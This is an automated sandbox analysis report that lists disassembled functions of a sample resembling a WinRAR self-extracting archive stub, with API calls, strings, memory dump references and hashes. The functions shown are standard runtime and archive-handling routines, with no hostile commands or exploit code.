                                                                                                                                  • Opcode ID: d138a6149cb94658482696eae803298933698f9840492c4d4c7a2d1fb8fedf94
                                                                                                                                  • Instruction ID: 0d4baa2e7c9408414ee16962d0ba33bdcbcc6f86adf2430f4d10df9afc8b80d0
                                                                                                                                  • Opcode Fuzzy Hash: d138a6149cb94658482696eae803298933698f9840492c4d4c7a2d1fb8fedf94
                                                                                                                                  • Instruction Fuzzy Hash: DC5160B19002499FDB10CFA8D845FEEBBF5FB09310F14416EE655E7252D630EA41CBA1
                                                                                                                                  Function 008C2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C2937
                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 008C293F
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C29C8
                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 008C29F3
                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 008C2A48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                  • Opcode ID: 890b01927dca2cb18cb391713838d35a2243b8f02556a85ec2fc8bd6d8da4478
                                                                                                                                  • Instruction ID: 30f07cad83b384f764f7895540f985bd3afbfb7cda76d77569e807c36b412b87
                                                                                                                                  • Opcode Fuzzy Hash: 890b01927dca2cb18cb391713838d35a2243b8f02556a85ec2fc8bd6d8da4478
                                                                                                                                  • Instruction Fuzzy Hash: E9416B34A00219ABCF10DF69C885F9EBBB5FF44324F14816AE819EB392D771DA15CB91
                                                                                                                                  Function 008B9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 008B9EEE
                                                                                                                                  • GetWindowRect.USER32(?,00000000), ref: 008B9F44
                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 008B9FDB
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 008B9FE3
                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 008B9FF9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$RectText
                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                  • API String ID: 3937224194-1658105358
                                                                                                                                  • Opcode ID: 4c472c693d7d716658acdc60435560c56e543fa0ca4708cadbf81cd15821bb7d
                                                                                                                                  • Instruction ID: 95d55e18a77bf9f085de7c04d66dd0d36e83b174e4433287a7d4054224a65d36
                                                                                                                                  • Opcode Fuzzy Hash: 4c472c693d7d716658acdc60435560c56e543fa0ca4708cadbf81cd15821bb7d
                                                                                                                                  • Instruction Fuzzy Hash: F241A03100C214EFCB616F64DC48BAB7FA8FF48711F008559F989D9266DB34D945DBA2
                                                                                                                                  Function 008B9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen
                                                                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                  • API String ID: 176396367-3743748572
                                                                                                                                  • Opcode ID: 2215826e54c6bc961bdb7f2e75b81b6aba60ab90e26ae5cff54b65cc3641f5ff
                                                                                                                                  • Instruction ID: 785ac299ca4021eabc0345587f303ea9dac90d9eca2317654f2b1ba3d1a7ac37
                                                                                                                                  • Opcode Fuzzy Hash: 2215826e54c6bc961bdb7f2e75b81b6aba60ab90e26ae5cff54b65cc3641f5ff
                                                                                                                                  • Instruction Fuzzy Hash: A131492264435596DA30AB549C42BBA73B4FB90720F60842FFAD6D73C0FA64ED4183A2
                                                                                                                                  Function 008CC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008CC868: _free.LIBCMT ref: 008CC891
                                                                                                                                  • _free.LIBCMT ref: 008CC8F2
                                                                                                                                    • Part of subcall function 008C8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?), ref: 008C8DE2
                                                                                                                                    • Part of subcall function 008C8DCC: GetLastError.KERNEL32(?,?,008CC896,?,00000000,?,00000000,?,008CC8BD,?,00000007,?,?,008CCCBA,?,?), ref: 008C8DF4
                                                                                                                                  • _free.LIBCMT ref: 008CC8FD
                                                                                                                                  • _free.LIBCMT ref: 008CC908
                                                                                                                                  • _free.LIBCMT ref: 008CC95C
                                                                                                                                  • _free.LIBCMT ref: 008CC967
                                                                                                                                  • _free.LIBCMT ref: 008CC972
                                                                                                                                  • _free.LIBCMT ref: 008CC97D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                  • Instruction ID: f68c3e0414e99b98ed23c7039636df7d21bf3ca3cbdd57fd0535ea33dc7f4af4
                                                                                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                  • Instruction Fuzzy Hash: 5F11EA71580B04EAE520B7B9DC06FCB7BB8FF04B00F804829F3AEE6092DA75E5058752
                                                                                                                                  Function 008BE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,008BE669,008BE5CC,008BE86D), ref: 008BE605
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 008BE61B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 008BE630
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                  • API String ID: 667068680-1718035505
                                                                                                                                  • Opcode ID: 26279a25dd0b7b237db7708aa4ea4a50a5693b0f320949f028683a186a98f56c
                                                                                                                                  • Instruction ID: 513d7cc20ad7496c6f4b0ce9ce7b3bd91a36b5871381e491633d4a2a716c4469
                                                                                                                                  • Opcode Fuzzy Hash: 26279a25dd0b7b237db7708aa4ea4a50a5693b0f320949f028683a186a98f56c
                                                                                                                                  • Instruction Fuzzy Hash: 2FF0CD3179162A9F9B224FA46C84AE623D8FE37755304063AE942D3340EB24CC50EA92
                                                                                                                                  Function 008B146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B14C2
                                                                                                                                    • Part of subcall function 008AB146: GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008B14E6
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008B1500
                                                                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008B1513
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1523
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 008B1533
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2092733347-0
                                                                                                                                  • Opcode ID: 96d91c374327680661b16102a9c2e2b4be0a47146e8cd9fc39331bf96ffa42e4
                                                                                                                                  • Instruction ID: fff0971cb47d7e9907b358d78d0227d35cfd3ffd2b19f47d627f74d310cd24cd
                                                                                                                                  • Opcode Fuzzy Hash: 96d91c374327680661b16102a9c2e2b4be0a47146e8cd9fc39331bf96ffa42e4
                                                                                                                                  • Instruction Fuzzy Hash: F531E875108346ABC704DFA8C88499BBBF8FF98714F404A1EF999C3210E730D549CBA6
                                                                                                                                  Function 008C2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,008C2AF1,008C02FC,008BFA34), ref: 008C2B08
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008C2B16
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008C2B2F
                                                                                                                                  • SetLastError.KERNEL32(00000000,008C2AF1,008C02FC,008BFA34), ref: 008C2B81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: 66d16558925de6da6662b3107a9595766eb2ffba8c39fe5810e002c4a11cb7e9
                                                                                                                                  • Instruction ID: f70047f7c1a0581c2b6643d491c1c5832c8972e409fd6fba74448e80ec3750a7
                                                                                                                                  • Opcode Fuzzy Hash: 66d16558925de6da6662b3107a9595766eb2ffba8c39fe5810e002c4a11cb7e9
                                                                                                                                  • Instruction Fuzzy Hash: 2801D43210A712EEE6542B787C85F2A2B79FB01B74760473EF210D94E0EF31CC019245
                                                                                                                                  Function 008C97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,008E1030,008C4674,008E1030,?,?,008C3F73,00000050,?,008E1030,00000200), ref: 008C97E9
                                                                                                                                  • _free.LIBCMT ref: 008C981C
                                                                                                                                  • _free.LIBCMT ref: 008C9844
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C9851
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,008E1030,00000200), ref: 008C985D
                                                                                                                                  • _abort.LIBCMT ref: 008C9863
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                  • Opcode ID: ace316b2404d3feca30b7cb7f2e07b828ff88db1eb84c8cb03b8d62d8a6ec424
                                                                                                                                  • Instruction ID: f179e1fc522131c8433a324e1f0e3f6c19c0fe381e406260497c087f6547b95a
                                                                                                                                  • Opcode Fuzzy Hash: ace316b2404d3feca30b7cb7f2e07b828ff88db1eb84c8cb03b8d62d8a6ec424
                                                                                                                                  • Instruction Fuzzy Hash: 5CF08136141A05A6D652332CBC0EF1B2B75FBD2B65F25027DF655D7192EE30CC014666
                                                                                                                                  Function 008BDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008BDC47
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BDC61
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BDC72
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BDC7C
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BDC86
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 008BDC91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2148572870-0
                                                                                                                                  • Opcode ID: 9cdbdeff8dd8557fe0203b77a0f5f595dffca41592dfbd73aa45766acbcdd7cb
                                                                                                                                  • Instruction ID: c739f39b1f8acc92ec5447c295686fe0bd1c4fc05726045f097086c94ce46a8f
                                                                                                                                  • Opcode Fuzzy Hash: 9cdbdeff8dd8557fe0203b77a0f5f595dffca41592dfbd73aa45766acbcdd7cb
                                                                                                                                  • Instruction Fuzzy Hash: BCF06272A02219BBCB206BA5DC4CDDF7F7DFF41791B008111F50AE2151E675D646C7A1
                                                                                                                                  Function 008AC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008B05DA: _wcslen.LIBCMT ref: 008B05E0
                                                                                                                                    • Part of subcall function 008AB92D: _wcsrchr.LIBVCRUNTIME ref: 008AB944
                                                                                                                                  • _wcslen.LIBCMT ref: 008AC197
                                                                                                                                  • _wcslen.LIBCMT ref: 008AC1DF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                                                                  • String ID: .exe$.rar$.sfx
                                                                                                                                  • API String ID: 3513545583-31770016
                                                                                                                                  • Opcode ID: 465566cd6c15fa55087e9548c97271acc4b01e00a58e916e2e1e04ff24e0d72e
                                                                                                                                  • Instruction ID: 3a2ccd125b6ac0b1be6e4887f0d5d740ed352ac2863115ab727fbef3e5ae1922
                                                                                                                                  • Opcode Fuzzy Hash: 465566cd6c15fa55087e9548c97271acc4b01e00a58e916e2e1e04ff24e0d72e
                                                                                                                                  • Instruction Fuzzy Hash: B9414C21640715A5E732AF788852A7BB7B4FF43744F14450EF991EBA82FB904D81C396
                                                                                                                                  Function 008BCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 008BCE9D
                                                                                                                                    • Part of subcall function 008AB690: _wcslen.LIBCMT ref: 008AB696
                                                                                                                                  • _swprintf.LIBCMT ref: 008BCED1
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000066,008E946A), ref: 008BCEF1
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 008BCFFE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                  • String ID: %s%s%u
                                                                                                                                  • API String ID: 110358324-1360425832
                                                                                                                                  • Opcode ID: 1575117711815ce1890093b518013d42b2e7c88beb63ec23f3b0266671dbb7bf
                                                                                                                                  • Instruction ID: 00e31e738bd849dc3a8167936a77669608e4e0325ea96802a322a45abab9fbc3
                                                                                                                                  • Opcode Fuzzy Hash: 1575117711815ce1890093b518013d42b2e7c88beb63ec23f3b0266671dbb7bf
                                                                                                                                  • Instruction Fuzzy Hash: 1F419271900658BADF259B94CC85EEE77FCFB05344F4080A6F909E7291EEB09A44CF66
                                                                                                                                  Function 008ABB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,008AA275,?,?,00000800,?,008AA23A,?,008A755C), ref: 008ABBC5
                                                                                                                                  • _wcslen.LIBCMT ref: 008ABC3B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                                                                  • String ID: UNC$\\?\
                                                                                                                                  • API String ID: 3341907918-253988292
                                                                                                                                  • Opcode ID: bd5d509296e61953d0c7bd3a2110e0ab3e853912a79e08714ea67c3ec64c4824
                                                                                                                                  • Instruction ID: b0c3aee85811cae31341b52a58480f6cb68fccd799b9950af9887935d4b74e7d
                                                                                                                                  • Opcode Fuzzy Hash: bd5d509296e61953d0c7bd3a2110e0ab3e853912a79e08714ea67c3ec64c4824
                                                                                                                                  • Instruction Fuzzy Hash: 3041B331400219B6EF21AF64CC41EEB7BA9FF433A4F104566F814E3A52EB74DE918B61
                                                                                                                                  Function 008BB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadBitmapW.USER32(00000065), ref: 008BB6ED
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008BB712
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BB744
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 008BB767
                                                                                                                                    • Part of subcall function 008BA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,008BB73D,00000066), ref: 008BA6D5
                                                                                                                                    • Part of subcall function 008BA6C2: SizeofResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA6EC
